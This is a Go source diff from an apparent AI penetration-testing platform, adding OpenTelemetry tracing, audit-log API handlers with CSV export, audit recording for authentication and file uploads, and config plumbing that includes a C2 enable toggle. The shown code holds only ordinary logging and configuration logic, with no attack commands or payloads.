b, err := json.Marshal(in)
if err != nil {
return fmt.Sprintf("%T", in)
}
return truncateRunes(string(b), maxRunes)
}
func summarizeCallbackOutput(out callbacks.CallbackOutput, maxRunes int) string {
if out == nil {
return ""
}
if ao := adk.ConvAgentCallbackOutput(out); ao != nil {
return "agent_events=stream"
}
if mo := model.ConvCallbackOutput(out); mo != nil && mo.Message != nil {
s := ""
if mo.Message.Content != "" {
s = mo.Message.Content
}
if mo.TokenUsage != nil {
return fmt.Sprintf("tokens total=%d completion=%d prompt=%d text=%s",
mo.TokenUsage.TotalTokens, mo.TokenUsage.CompletionTokens, mo.TokenUsage.PromptTokens,
truncateRunes(s, minInt(120, maxRunes)))
}
return "assistant len=" + itoa(len(s))
}
if to := tool.ConvCallbackOutput(out); to != nil {
if to.Response != "" {
return truncateRunes(to.Response, maxRunes)
}
if to.ToolOutput != nil {
return "tool_result multimodal"
}
}
b, err := json.Marshal(out)
if err != nil {
return fmt.Sprintf("%T", out)
}
return truncateRunes(string(b), maxRunes)
}
func minInt(a, b int) int {
if a < b {
return a
}
return b
}
func itoa(n int) string {
return fmt.Sprintf("%d", n)
}
func truncateRunes(s string, maxRunes int) string {
if maxRunes <= 0 {
return ""
}
r := []rune(s)
if len(r) <= maxRunes {
return s
}
return string(r[:maxRunes]) + "…"
}
+26
View File
@@ -0,0 +1,26 @@
package einoobserve
import (
"context"
"testing"
"cyberstrike-ai/internal/config"
)
func TestAttachAgentRunCallbacks_Disabled(t *testing.T) {
ctx := context.Background()
cfg := &config.MultiAgentEinoCallbacksConfig{Enabled: false}
out := AttachAgentRunCallbacks(ctx, cfg, Params{})
if out != ctx {
t.Fatalf("expected same ctx when disabled")
}
}
func TestTruncateRunes(t *testing.T) {
if got := truncateRunes("abc", 10); got != "abc" {
t.Fatalf("got %q", got)
}
if got := truncateRunes("abcdefghij", 4); got != "abcd…" {
t.Fatalf("got %q", got)
}
}
+111
View File
@@ -0,0 +1,111 @@
package einoobserve
import (
"context"
"fmt"
"strings"
"sync"
"cyberstrike-ai/internal/config"
"go.opentelemetry.io/otel"
"go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp"
"go.opentelemetry.io/otel/exporters/stdout/stdouttrace"
"go.opentelemetry.io/otel/sdk/resource"
sdktrace "go.opentelemetry.io/otel/sdk/trace"
semconv "go.opentelemetry.io/otel/semconv/v1.26.0"
"go.uber.org/zap"
)
var (
otelMu sync.Mutex
otelShutdown func(context.Context) error
otelInitialized bool
)
// InitOtelFromConfig installs the global OpenTelemetry TracerProvider when
// eino_callbacks.otel is enabled and exporter is not none. Safe to call multiple times.
func InitOtelFromConfig(cfg *config.MultiAgentEinoCallbacksConfig, log *zap.Logger) (shutdown func(context.Context) error, err error) {
shutdown = func(context.Context) error { return nil }
if cfg == nil || !cfg.OtelTracingActive() {
return shutdown, nil
}
otelMu.Lock()
defer otelMu.Unlock()
if otelInitialized {
if otelShutdown != nil {
return otelShutdown, nil
}
return shutdown, nil
}
oc := cfg.Otel
expKind := oc.OtelExporterEffective()
ctx := context.Background()
var exporter sdktrace.SpanExporter
switch expKind {
case "stdout":
exporter, err = stdouttrace.New()
if err != nil {
return shutdown, fmt.Errorf("eino otel stdout exporter: %w", err)
}
case "otlphttp":
ep := strings.TrimSpace(oc.OTLPEndpoint)
if ep == "" {
ep = "localhost:4318"
}
exporter, err = otlptracehttp.New(ctx,
otlptracehttp.WithEndpoint(ep),
otlptracehttp.WithURLPath("/v1/traces"),
)
if err != nil {
return shutdown, fmt.Errorf("eino otel otlphttp exporter: %w", err)
}
default:
return shutdown, nil
}
res, err := resource.New(ctx,
resource.WithAttributes(
semconv.ServiceName(oc.ServiceNameEffective()),
),
)
if err != nil {
return shutdown, fmt.Errorf("eino otel resource: %w", err)
}
sampler := sdktrace.ParentBased(sdktrace.TraceIDRatioBased(oc.SampleRatioEffective()))
tp := sdktrace.NewTracerProvider(
sdktrace.WithBatcher(exporter),
sdktrace.WithResource(res),
sdktrace.WithSampler(sampler),
)
otel.SetTracerProvider(tp)
otelShutdown = tp.Shutdown
otelInitialized = true
if log != nil {
log.Info("eino otel: tracer provider initialized",
zap.String("exporter", expKind),
zap.String("service", oc.ServiceNameEffective()),
zap.Float64("sample_ratio", oc.SampleRatioEffective()),
)
}
return otelShutdown, nil
}
// ShutdownOtel flushes and shuts down the global TracerProvider if it was installed.
func ShutdownOtel(ctx context.Context) error {
otelMu.Lock()
fn := otelShutdown
otelShutdown = nil
inited := otelInitialized
otelInitialized = false
otelMu.Unlock()
if !inited || fn == nil {
return nil
}
return fn(ctx)
}
+587 -305
View File
File diff suppressed because it is too large Load Diff
+2 -3
View File
@@ -83,7 +83,7 @@ func (h *AttackChainHandler) GetAttackChain(c *gin.Context) {
// 使用锁机制防止同一对话的并发生成 // 使用锁机制防止同一对话的并发生成
lockInterface, _ := h.generatingLocks.LoadOrStore(conversationID, &sync.Mutex{}) lockInterface, _ := h.generatingLocks.LoadOrStore(conversationID, &sync.Mutex{})
lock := lockInterface.(*sync.Mutex) lock := lockInterface.(*sync.Mutex)
// 尝试获取锁,如果正在生成则返回错误 // 尝试获取锁,如果正在生成则返回错误
acquired := lock.TryLock() acquired := lock.TryLock()
if !acquired { if !acquired {
@@ -144,7 +144,7 @@ func (h *AttackChainHandler) RegenerateAttackChain(c *gin.Context) {
// 使用锁机制防止并发生成 // 使用锁机制防止并发生成
lockInterface, _ := h.generatingLocks.LoadOrStore(conversationID, &sync.Mutex{}) lockInterface, _ := h.generatingLocks.LoadOrStore(conversationID, &sync.Mutex{})
lock := lockInterface.(*sync.Mutex) lock := lockInterface.(*sync.Mutex)
acquired := lock.TryLock() acquired := lock.TryLock()
if !acquired { if !acquired {
h.logger.Info("攻击链正在生成中,请稍后再试", zap.String("conversationId", conversationID)) h.logger.Info("攻击链正在生成中,请稍后再试", zap.String("conversationId", conversationID))
@@ -170,4 +170,3 @@ func (h *AttackChainHandler) RegenerateAttackChain(c *gin.Context) {
c.JSON(http.StatusOK, chain) c.JSON(http.StatusOK, chain)
} }
+147
View File
@@ -0,0 +1,147 @@
package handler
import (
"net/http"
"time"
"cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/database"
"github.com/gin-gonic/gin"
"go.uber.org/zap"
)
// AuditHandler serves platform audit log APIs.
type AuditHandler struct {
db *database.DB
audit *audit.Service
logger *zap.Logger
}
// NewAuditHandler creates an audit log handler.
func NewAuditHandler(db *database.DB, auditSvc *audit.Service, logger *zap.Logger) *AuditHandler {
return &AuditHandler{db: db, audit: auditSvc, logger: logger}
}
// Meta GET /api/audit/meta
func (h *AuditHandler) Meta(c *gin.Context) {
enabled := false
retentionDays := 0
if h.audit != nil {
enabled = h.audit.Enabled()
retentionDays = h.audit.RetentionDays()
}
c.JSON(http.StatusOK, gin.H{
"enabled": enabled,
"retention_days": retentionDays,
"default_page_size": 20,
"max_page_size": 100,
"max_export": 5000,
})
}
// Summary GET /api/audit/summary
func (h *AuditHandler) Summary(c *gin.Context) {
if h.db == nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"})
return
}
base := auditFilterFromQuery(c)
total, err := h.db.CountAuditLogs(base)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
failFilter := base
failFilter.Result = "failure"
failures, err := h.db.CountAuditLogs(failFilter)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
since := time.Now().AddDate(0, 0, -7)
recentFilter := base
recentFilter.Since = &since
recent7d, err := h.db.CountAuditLogs(recentFilter)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
c.JSON(http.StatusOK, gin.H{
"total": total,
"failures": failures,
"recent_7d": recent7d,
"has_filters": c.Query("category") != "" || c.Query("action") != "" || c.Query("result") != "" ||
c.Query("q") != "" || c.Query("since") != "" || c.Query("until") != "",
})
}
// ListLogs GET /api/audit/logs
func (h *AuditHandler) ListLogs(c *gin.Context) {
if h.db == nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"})
return
}
filter := auditFilterFromQuery(c)
page, pageSize := auditPaginationFromQuery(c)
filter.Limit = pageSize
filter.Offset = (page - 1) * pageSize
logs, err := h.db.ListAuditLogs(filter)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
total, err := h.db.CountAuditLogs(filter)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
c.JSON(http.StatusOK, gin.H{
"logs": logs,
"total": total,
"page": page,
"page_size": pageSize,
})
}
// GetLog GET /api/audit/logs/:id
func (h *AuditHandler) GetLog(c *gin.Context) {
if h.db == nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"})
return
}
row, err := h.db.GetAuditLogByID(c.Param("id"))
if err != nil {
c.JSON(http.StatusNotFound, gin.H{"error": "审计记录不存在"})
return
}
audit.ApplyResourceAvailability(h.db, row)
c.JSON(http.StatusOK, gin.H{"log": row})
}
// ExportLogs GET /api/audit/logs/export — JSON or CSV (?format=csv), max 5000 rows.
func (h *AuditHandler) ExportLogs(c *gin.Context) {
if h.db == nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": "database unavailable"})
return
}
filter := auditFilterFromQuery(c)
filter.Limit = 5000
filter.Offset = 0
logs, err := h.db.ListAuditLogs(filter)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
if c.Query("format") == "csv" {
writeAuditLogsCSV(c, logs)
return
}
c.Header("Content-Disposition", `attachment; filename="audit-logs.json"`)
c.JSON(http.StatusOK, gin.H{
"exported_at": time.Now().UTC().Format(time.RFC3339),
"logs": logs,
})
}
+42
View File
@@ -0,0 +1,42 @@
package handler
import (
"encoding/csv"
"fmt"
"time"
"cyberstrike-ai/internal/database"
"github.com/gin-gonic/gin"
)
func writeAuditLogsCSV(c *gin.Context, logs []*database.AuditLog) {
c.Header("Content-Type", "text/csv; charset=utf-8")
c.Header("Content-Disposition", fmt.Sprintf(`attachment; filename="audit-logs-%s.csv"`, time.Now().Format("20060102")))
w := csv.NewWriter(c.Writer)
_ = w.Write([]string{
"id", "created_at", "level", "category", "action", "result", "actor",
"session_hint", "client_ip", "resource_type", "resource_id", "message",
})
for _, row := range logs {
if row == nil {
continue
}
_ = w.Write([]string{
row.ID,
row.CreatedAt.UTC().Format(time.RFC3339),
row.Level,
row.Category,
row.Action,
row.Result,
row.Actor,
row.SessionHint,
row.ClientIP,
row.ResourceType,
row.ResourceID,
row.Message,
})
}
w.Flush()
}
+48
View File
@@ -0,0 +1,48 @@
package handler
import (
"strconv"
"time"
"cyberstrike-ai/internal/database"
"github.com/gin-gonic/gin"
)
func auditFilterFromQuery(c *gin.Context) database.ListAuditLogsFilter {
filter := database.ListAuditLogsFilter{
Level: c.Query("level"),
Category: c.Query("category"),
Action: c.Query("action"),
Result: c.Query("result"),
Query: c.Query("q"),
ResourceType: c.Query("resource_type"),
ResourceID: c.Query("resource_id"),
}
if since := c.Query("since"); since != "" {
if t, err := time.Parse(time.RFC3339, since); err == nil {
filter.Since = &t
}
}
if until := c.Query("until"); until != "" {
if t, err := time.Parse(time.RFC3339, until); err == nil {
filter.Until = &t
}
}
return filter
}
func auditPaginationFromQuery(c *gin.Context) (page, pageSize int) {
page = 1
pageSize = 20
if p, err := strconv.Atoi(c.DefaultQuery("page", "1")); err == nil && p > 0 {
page = p
}
if ps, err := strconv.Atoi(c.DefaultQuery("page_size", "20")); err == nil && ps > 0 {
pageSize = ps
if pageSize > 100 {
pageSize = 100
}
}
return page, pageSize
}
+55
View File
@@ -5,6 +5,7 @@ import (
"strings" "strings"
"time" "time"
"cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/security" "cyberstrike-ai/internal/security"
@@ -18,6 +19,12 @@ type AuthHandler struct {
config *config.Config config *config.Config
configPath string configPath string
logger *zap.Logger logger *zap.Logger
audit *audit.Service
}
// SetAudit wires platform audit logging.
func (h *AuthHandler) SetAudit(s *audit.Service) {
h.audit = s
} }
// NewAuthHandler creates a new AuthHandler. // NewAuthHandler creates a new AuthHandler.
@@ -49,10 +56,32 @@ func (h *AuthHandler) Login(c *gin.Context) {
token, expiresAt, err := h.manager.Authenticate(req.Password) token, expiresAt, err := h.manager.Authenticate(req.Password)
if err != nil { if err != nil {
if h.audit != nil {
h.audit.Record(c, audit.Entry{
Level: "warn",
Category: "auth",
Action: "login",
Result: "failure",
Message: "登录失败:密码错误",
})
}
c.JSON(http.StatusUnauthorized, gin.H{"error": "密码错误"}) c.JSON(http.StatusUnauthorized, gin.H{"error": "密码错误"})
return return
} }
if h.audit != nil {
h.audit.Record(c, audit.Entry{
Category: "auth",
Action: "login",
Result: "success",
SessionHint: audit.HintFromToken(token),
Message: "登录成功",
Detail: map[string]interface{}{
"expires_at": expiresAt.UTC().Format(time.RFC3339),
},
})
}
c.JSON(http.StatusOK, gin.H{ c.JSON(http.StatusOK, gin.H{
"token": token, "token": token,
"expires_at": expiresAt.UTC().Format(time.RFC3339), "expires_at": expiresAt.UTC().Format(time.RFC3339),
@@ -73,6 +102,14 @@ func (h *AuthHandler) Logout(c *gin.Context) {
} }
h.manager.RevokeToken(token) h.manager.RevokeToken(token)
if h.audit != nil {
h.audit.Record(c, audit.Entry{
Category: "auth",
Action: "logout",
Result: "success",
Message: "退出登录",
})
}
c.JSON(http.StatusOK, gin.H{"message": "已退出登录"}) c.JSON(http.StatusOK, gin.H{"message": "已退出登录"})
} }
@@ -103,6 +140,15 @@ func (h *AuthHandler) ChangePassword(c *gin.Context) {
} }
if !h.manager.CheckPassword(oldPassword) { if !h.manager.CheckPassword(oldPassword) {
if h.audit != nil {
h.audit.Record(c, audit.Entry{
Level: "warn",
Category: "auth",
Action: "change_password",
Result: "failure",
Message: "修改密码失败:当前密码不正确",
})
}
c.JSON(http.StatusBadRequest, gin.H{"error": "当前密码不正确"}) c.JSON(http.StatusBadRequest, gin.H{"error": "当前密码不正确"})
return return
} }
@@ -132,6 +178,15 @@ func (h *AuthHandler) ChangePassword(c *gin.Context) {
h.logger.Info("登录密码已更新,所有会话已失效") h.logger.Info("登录密码已更新,所有会话已失效")
} }
if h.audit != nil {
h.audit.Record(c, audit.Entry{
Category: "auth",
Action: "change_password",
Result: "success",
Message: "登录密码已修改",
})
}
c.JSON(http.StatusOK, gin.H{"message": "密码已更新,请使用新密码重新登录"}) c.JSON(http.StatusOK, gin.H{"message": "密码已更新,请使用新密码重新登录"})
} }
File diff suppressed because it is too large Load Diff
+16
View File
@@ -12,6 +12,8 @@ import (
"time" "time"
"unicode/utf8" "unicode/utf8"
"cyberstrike-ai/internal/audit"
"github.com/gin-gonic/gin" "github.com/gin-gonic/gin"
"go.uber.org/zap" "go.uber.org/zap"
) )
@@ -24,6 +26,12 @@ const (
// ChatUploadsHandler 对话中上传附件(chat_uploads 目录)的管理 API // ChatUploadsHandler 对话中上传附件(chat_uploads 目录)的管理 API
type ChatUploadsHandler struct { type ChatUploadsHandler struct {
logger *zap.Logger logger *zap.Logger
audit *audit.Service
}
// SetAudit wires platform audit logging.
func (h *ChatUploadsHandler) SetAudit(s *audit.Service) {
h.audit = s
} }
// NewChatUploadsHandler 创建处理器 // NewChatUploadsHandler 创建处理器
@@ -230,6 +238,9 @@ func (h *ChatUploadsHandler) Delete(c *gin.Context) {
return return
} }
} }
if h.audit != nil {
h.audit.RecordOK(c, "file", "delete", "删除对话附件", "chat_upload", body.Path, nil)
}
c.JSON(http.StatusOK, gin.H{"ok": true}) c.JSON(http.StatusOK, gin.H{"ok": true})
} }
@@ -503,6 +514,11 @@ func (h *ChatUploadsHandler) Upload(c *gin.Context) {
} }
rel, _ := filepath.Rel(root, fullPath) rel, _ := filepath.Rel(root, fullPath)
absSaved, _ := filepath.Abs(fullPath) absSaved, _ := filepath.Abs(fullPath)
if h.audit != nil {
h.audit.RecordOK(c, "file", "upload", "上传对话附件", "chat_upload", filepath.ToSlash(rel), map[string]interface{}{
"name": unique,
})
}
c.JSON(http.StatusOK, gin.H{ c.JSON(http.StatusOK, gin.H{
"ok": true, "ok": true,
"relativePath": filepath.ToSlash(rel), "relativePath": filepath.ToSlash(rel),
+254 -32
View File
@@ -14,9 +14,11 @@ import (
"time" "time"
"cyberstrike-ai/internal/agents" "cyberstrike-ai/internal/agents"
"cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/knowledge" "cyberstrike-ai/internal/knowledge"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/mcp/builtin"
"cyberstrike-ai/internal/openai" "cyberstrike-ai/internal/openai"
"cyberstrike-ai/internal/security" "cyberstrike-ai/internal/security"
@@ -40,6 +42,14 @@ type SkillsToolRegistrar func() error
// BatchTaskToolRegistrar 批量任务 MCP 工具注册器(ApplyConfig 时重新注册) // BatchTaskToolRegistrar 批量任务 MCP 工具注册器(ApplyConfig 时重新注册)
type BatchTaskToolRegistrar func() error type BatchTaskToolRegistrar func() error
// C2ToolRegistrar C2 MCP 工具注册器(ApplyConfig 时 ClearTools 之后调用)
type C2ToolRegistrar func() error
// C2Runtime ApplyConfig 时按配置启停 C2 子系统(由 internal/app.App 实现)
type C2Runtime interface {
ReconcileC2AfterConfigApply() error
}
// RetrieverUpdater 检索器更新接口 // RetrieverUpdater 检索器更新接口
type RetrieverUpdater interface { type RetrieverUpdater interface {
UpdateConfig(config *knowledge.RetrievalConfig) UpdateConfig(config *knowledge.RetrievalConfig)
@@ -72,10 +82,13 @@ type ConfigHandler struct {
webshellToolRegistrar WebshellToolRegistrar // WebShell 工具注册器(可选) webshellToolRegistrar WebshellToolRegistrar // WebShell 工具注册器(可选)
skillsToolRegistrar SkillsToolRegistrar // Skills工具注册器(可选) skillsToolRegistrar SkillsToolRegistrar // Skills工具注册器(可选)
batchTaskToolRegistrar BatchTaskToolRegistrar // 批量任务 MCP 工具(可选) batchTaskToolRegistrar BatchTaskToolRegistrar // 批量任务 MCP 工具(可选)
c2ToolRegistrar C2ToolRegistrar // C2 MCP 工具(可选)
c2Runtime C2Runtime // C2 启停(可选)
retrieverUpdater RetrieverUpdater // 检索器更新器(可选) retrieverUpdater RetrieverUpdater // 检索器更新器(可选)
knowledgeInitializer KnowledgeInitializer // 知识库初始化器(可选) knowledgeInitializer KnowledgeInitializer // 知识库初始化器(可选)
appUpdater AppUpdater // App更新器(可选) appUpdater AppUpdater // App更新器(可选)
robotRestarter RobotRestarter // 机器人连接重启器(可选),ApplyConfig 时重启钉钉/飞书 robotRestarter RobotRestarter // 机器人连接重启器(可选),ApplyConfig 时重启钉钉/飞书
audit *audit.Service
logger *zap.Logger logger *zap.Logger
mu sync.RWMutex mu sync.RWMutex
lastEmbeddingConfig *config.EmbeddingConfig // 上一次的嵌入模型配置(用于检测变更) lastEmbeddingConfig *config.EmbeddingConfig // 上一次的嵌入模型配置(用于检测变更)
@@ -90,6 +103,7 @@ type AttackChainUpdater interface {
type AgentUpdater interface { type AgentUpdater interface {
UpdateConfig(cfg *config.OpenAIConfig) UpdateConfig(cfg *config.OpenAIConfig)
UpdateMaxIterations(maxIterations int) UpdateMaxIterations(maxIterations int)
UpdateToolDescriptionMode(mode string)
} }
// NewConfigHandler 创建新的配置处理器 // NewConfigHandler 创建新的配置处理器
@@ -152,6 +166,20 @@ func (h *ConfigHandler) SetBatchTaskToolRegistrar(registrar BatchTaskToolRegistr
h.batchTaskToolRegistrar = registrar h.batchTaskToolRegistrar = registrar
} }
// SetC2ToolRegistrar 设置 C2 MCP 工具注册器
func (h *ConfigHandler) SetC2ToolRegistrar(registrar C2ToolRegistrar) {
h.mu.Lock()
defer h.mu.Unlock()
h.c2ToolRegistrar = registrar
}
// SetC2Runtime 设置 C2 运行时(Apply 时启停)
func (h *ConfigHandler) SetC2Runtime(rt C2Runtime) {
h.mu.Lock()
defer h.mu.Unlock()
h.c2Runtime = rt
}
// SetRetrieverUpdater 设置检索器更新器 // SetRetrieverUpdater 设置检索器更新器
func (h *ConfigHandler) SetRetrieverUpdater(updater RetrieverUpdater) { func (h *ConfigHandler) SetRetrieverUpdater(updater RetrieverUpdater) {
h.mu.Lock() h.mu.Lock()
@@ -180,6 +208,32 @@ func (h *ConfigHandler) SetRobotRestarter(restarter RobotRestarter) {
h.robotRestarter = restarter h.robotRestarter = restarter
} }
// SetAudit wires platform audit logging.
func (h *ConfigHandler) SetAudit(s *audit.Service) {
h.mu.Lock()
defer h.mu.Unlock()
h.audit = s
}
// ApplyWechatRobotBinding 微信 iLink 扫码绑定成功后写入配置并重启机器人连接
func (h *ConfigHandler) ApplyWechatRobotBinding(wc config.RobotWechatConfig) error {
h.mu.Lock()
wc.Enabled = true
h.config.Robots.Wechat = wc
h.mu.Unlock()
if err := h.saveConfig(); err != nil {
return err
}
if h.robotRestarter != nil {
h.robotRestarter.RestartRobotConnections()
}
h.logger.Info("微信机器人绑定已保存",
zap.String("ilink_bot_id", wc.ILinkBotID),
zap.Bool("enabled", wc.Enabled),
)
return nil
}
// GetConfigResponse 获取配置响应 // GetConfigResponse 获取配置响应
type GetConfigResponse struct { type GetConfigResponse struct {
OpenAI config.OpenAIConfig `json:"openai"` OpenAI config.OpenAIConfig `json:"openai"`
@@ -191,6 +245,7 @@ type GetConfigResponse struct {
Knowledge config.KnowledgeConfig `json:"knowledge"` Knowledge config.KnowledgeConfig `json:"knowledge"`
Robots config.RobotsConfig `json:"robots,omitempty"` Robots config.RobotsConfig `json:"robots,omitempty"`
MultiAgent config.MultiAgentPublic `json:"multi_agent,omitempty"` MultiAgent config.MultiAgentPublic `json:"multi_agent,omitempty"`
C2 config.C2Public `json:"c2"`
} }
// ToolConfigInfo 工具配置信息 // ToolConfigInfo 工具配置信息
@@ -232,13 +287,7 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
if configToolMap[mcpTool.Name] { if configToolMap[mcpTool.Name] {
continue continue
} }
description := mcpTool.ShortDescription description := h.pickToolDescription(mcpTool.ShortDescription, mcpTool.Description)
if description == "" {
description = mcpTool.Description
}
if len(description) > 10000 {
description = description[:10000] + "..."
}
tools = append(tools, ToolConfigInfo{ tools = append(tools, ToolConfigInfo{
Name: mcpTool.Name, Name: mcpTool.Name,
Description: description, Description: description,
@@ -270,11 +319,16 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
} }
multiPub := config.MultiAgentPublic{ multiPub := config.MultiAgentPublic{
Enabled: h.config.MultiAgent.Enabled, Enabled: h.config.MultiAgent.Enabled,
RobotUseMultiAgent: h.config.MultiAgent.RobotUseMultiAgent, RobotDefaultAgentMode: config.NormalizeRobotAgentMode(h.config.MultiAgent),
BatchUseMultiAgent: h.config.MultiAgent.BatchUseMultiAgent, BatchUseMultiAgent: h.config.MultiAgent.BatchUseMultiAgent,
SubAgentCount: subAgentCount, SubAgentCount: subAgentCount,
Orchestration: config.NormalizeMultiAgentOrchestration(h.config.MultiAgent.Orchestration), Orchestration: config.NormalizeMultiAgentOrchestration(h.config.MultiAgent.Orchestration),
PlanExecuteLoopMaxIterations: h.config.MultiAgent.PlanExecuteLoopMaxIterations, PlanExecuteLoopMaxIterations: h.config.MultiAgent.PlanExecuteLoopMaxIterations,
ToolSearchAlwaysVisibleTools: append([]string(nil), h.config.MultiAgent.EinoMiddleware.ToolSearchAlwaysVisibleTools...),
ToolSearchAlwaysVisibleEffectiveTools: mergeToolNameLists(
h.config.MultiAgent.EinoMiddleware.ToolSearchAlwaysVisibleTools,
builtin.GetAllBuiltinTools(),
),
} }
c.JSON(http.StatusOK, GetConfigResponse{ c.JSON(http.StatusOK, GetConfigResponse{
@@ -285,6 +339,7 @@ func (h *ConfigHandler) GetConfig(c *gin.Context) {
Agent: h.config.Agent, Agent: h.config.Agent,
Hitl: h.config.Hitl, Hitl: h.config.Hitl,
Knowledge: h.config.Knowledge, Knowledge: h.config.Knowledge,
C2: h.config.C2.Public(),
Robots: h.config.Robots, Robots: h.config.Robots,
MultiAgent: multiPub, MultiAgent: multiPub,
}) })
@@ -430,13 +485,7 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
continue continue
} }
description := mcpTool.ShortDescription description := h.pickToolDescription(mcpTool.ShortDescription, mcpTool.Description)
if description == "" {
description = mcpTool.Description
}
if len(description) > 10000 {
description = description[:10000] + "..."
}
toolInfo := ToolConfigInfo{ toolInfo := ToolConfigInfo{
Name: mcpTool.Name, Name: mcpTool.Name,
@@ -588,14 +637,46 @@ func (h *ConfigHandler) GetTools(c *gin.Context) {
// UpdateConfigRequest 更新配置请求 // UpdateConfigRequest 更新配置请求
type UpdateConfigRequest struct { type UpdateConfigRequest struct {
OpenAI *config.OpenAIConfig `json:"openai,omitempty"` OpenAI *config.OpenAIConfig `json:"openai,omitempty"`
FOFA *config.FofaConfig `json:"fofa,omitempty"` FOFA *config.FofaConfig `json:"fofa,omitempty"`
MCP *config.MCPConfig `json:"mcp,omitempty"` MCP *config.MCPConfig `json:"mcp,omitempty"`
Tools []ToolEnableStatus `json:"tools,omitempty"` Tools []ToolEnableStatus `json:"tools,omitempty"`
Agent *config.AgentConfig `json:"agent,omitempty"` Agent *AgentConfigUpdate `json:"agent,omitempty"`
Knowledge *config.KnowledgeConfig `json:"knowledge,omitempty"` Knowledge *config.KnowledgeConfig `json:"knowledge,omitempty"`
Robots *config.RobotsConfig `json:"robots,omitempty"` Robots *config.RobotsConfig `json:"robots,omitempty"`
MultiAgent *config.MultiAgentAPIUpdate `json:"multi_agent,omitempty"` MultiAgent *config.MultiAgentAPIUpdate `json:"multi_agent,omitempty"`
C2 *config.C2APIUpdate `json:"c2,omitempty"`
}
// AgentConfigUpdate 用于 PATCH /api/config 的 agent 段:仅 JSON 中出现的字段(指针非 nil)覆盖内存配置。
// 避免旧版「整包替换 *AgentConfig」时,未传的整型字段被反序列化为 0 误覆盖(例如 tool_timeout_minutes 变成 0)。
type AgentConfigUpdate struct {
MaxIterations *int `json:"max_iterations,omitempty"`
LargeResultThreshold *int `json:"large_result_threshold,omitempty"`
ResultStorageDir *string `json:"result_storage_dir,omitempty"`
ToolTimeoutMinutes *int `json:"tool_timeout_minutes,omitempty"`
SystemPromptPath *string `json:"system_prompt_path,omitempty"`
}
func applyAgentConfigUpdate(dst *config.AgentConfig, src *AgentConfigUpdate) {
if dst == nil || src == nil {
return
}
if src.MaxIterations != nil {
dst.MaxIterations = *src.MaxIterations
}
if src.LargeResultThreshold != nil {
dst.LargeResultThreshold = *src.LargeResultThreshold
}
if src.ResultStorageDir != nil {
dst.ResultStorageDir = *src.ResultStorageDir
}
if src.ToolTimeoutMinutes != nil {
dst.ToolTimeoutMinutes = *src.ToolTimeoutMinutes
}
if src.SystemPromptPath != nil {
dst.SystemPromptPath = *src.SystemPromptPath
}
} }
// ToolEnableStatus 工具启用状态 // ToolEnableStatus 工具启用状态
@@ -642,12 +723,19 @@ func (h *ConfigHandler) UpdateConfig(c *gin.Context) {
) )
} }
// 更新Agent配置 // 更新Agent配置(按字段合并,避免部分 JSON 把未出现的字段写成 0)
if req.Agent != nil { if req.Agent != nil {
h.config.Agent = *req.Agent applyAgentConfigUpdate(&h.config.Agent, req.Agent)
h.logger.Info("更新Agent配置", h.logger.Info("更新Agent配置",
zap.Int("max_iterations", h.config.Agent.MaxIterations), zap.Int("max_iterations", h.config.Agent.MaxIterations),
zap.Int("tool_timeout_minutes", h.config.Agent.ToolTimeoutMinutes),
) )
if h.agent != nil && req.Agent.MaxIterations != nil {
h.agent.UpdateMaxIterations(h.config.Agent.MaxIterations)
}
if h.mcpServer != nil {
h.mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(h.config.Agent.ToolTimeoutMinutes)
}
} }
// 更新Knowledge配置 // 更新Knowledge配置
@@ -675,25 +763,40 @@ func (h *ConfigHandler) UpdateConfig(c *gin.Context) {
if req.Robots != nil { if req.Robots != nil {
h.config.Robots = *req.Robots h.config.Robots = *req.Robots
h.logger.Info("更新机器人配置", h.logger.Info("更新机器人配置",
zap.Bool("wechat_enabled", h.config.Robots.Wechat.Enabled),
zap.Bool("wecom_enabled", h.config.Robots.Wecom.Enabled), zap.Bool("wecom_enabled", h.config.Robots.Wecom.Enabled),
zap.Bool("dingtalk_enabled", h.config.Robots.Dingtalk.Enabled), zap.Bool("dingtalk_enabled", h.config.Robots.Dingtalk.Enabled),
zap.Bool("lark_enabled", h.config.Robots.Lark.Enabled), zap.Bool("lark_enabled", h.config.Robots.Lark.Enabled),
) )
} }
if req.C2 != nil {
v := req.C2.Enabled
h.config.C2.Enabled = &v
h.logger.Info("更新C2配置", zap.Bool("enabled", v))
}
// 多代理标量(sub_agents 等仍由 config.yaml 维护) // 多代理标量(sub_agents 等仍由 config.yaml 维护)
if req.MultiAgent != nil { if req.MultiAgent != nil {
h.config.MultiAgent.Enabled = req.MultiAgent.Enabled h.config.MultiAgent.Enabled = req.MultiAgent.Enabled
h.config.MultiAgent.RobotUseMultiAgent = req.MultiAgent.RobotUseMultiAgent
h.config.MultiAgent.BatchUseMultiAgent = req.MultiAgent.BatchUseMultiAgent h.config.MultiAgent.BatchUseMultiAgent = req.MultiAgent.BatchUseMultiAgent
if mode := strings.TrimSpace(req.MultiAgent.RobotDefaultAgentMode); mode != "" {
h.config.MultiAgent.RobotDefaultAgentMode = mode
} else {
h.config.MultiAgent.RobotDefaultAgentMode = "react"
}
if req.MultiAgent.PlanExecuteLoopMaxIterations != nil { if req.MultiAgent.PlanExecuteLoopMaxIterations != nil {
